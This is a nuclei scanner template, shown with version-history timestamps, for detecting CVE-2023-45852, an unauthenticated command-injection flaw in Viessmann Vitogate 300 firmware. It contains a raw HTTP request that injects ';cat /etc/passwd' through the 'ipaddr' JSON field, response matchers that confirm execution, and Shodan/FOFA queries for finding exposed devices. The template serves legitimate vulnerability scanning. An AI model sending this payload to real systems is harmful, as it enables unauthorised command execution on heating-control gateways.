nuclei-templates/http/cves/2023/CVE-2023-45852.yaml

48 lines
1.8 KiB
YAML
Raw Normal View History

2023-10-20 13:47:42 +00:00
id: CVE-2023-45852
2023-10-20 15:36:05 +00:00
2023-10-20 13:47:42 +00:00
info:
2023-10-20 15:36:05 +00:00
name: Viessmann Vitogate 300 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
2023-10-20 13:47:42 +00:00
severity: critical
description: |
In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.
reference:
- https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html
- https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md
2023-10-20 15:36:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-45852
- https://github.com/tanjiti/sec_profile
- https://github.com/komodoooo/Some-things
2023-10-20 13:47:42 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-45852
cwe-id: CWE-77
epss-score: 0.09217
epss-percentile: 0.94519
2023-10-20 13:47:42 +00:00
cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: viessmann
product: vitogate_300_firmware
2023-10-20 15:36:05 +00:00
shodan-query: title:"Vitogate 300"
fofa-query: title="Vitogate 300"
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,rce,vitogate,viessmann
2023-10-20 13:47:42 +00:00
http:
- raw:
- |
POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
2023-10-20 15:36:05 +00:00
{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{randstr}};cat /etc/passwd"}}
2023-10-20 13:47:42 +00:00
matchers:
2023-10-20 15:36:05 +00:00
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(header, "application/json")'
- 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")'
condition: and
# digest: 490a0046304402202ee11b445730a11487beac586a250e3e5ac3e343b35612f67f4abb0c254ce653022073ace0b612ed4c38fc8353b59528a7024a4575c7367bf7a8eb2f66faa81bc75d:922c64590222798bb761d5b6d8e72950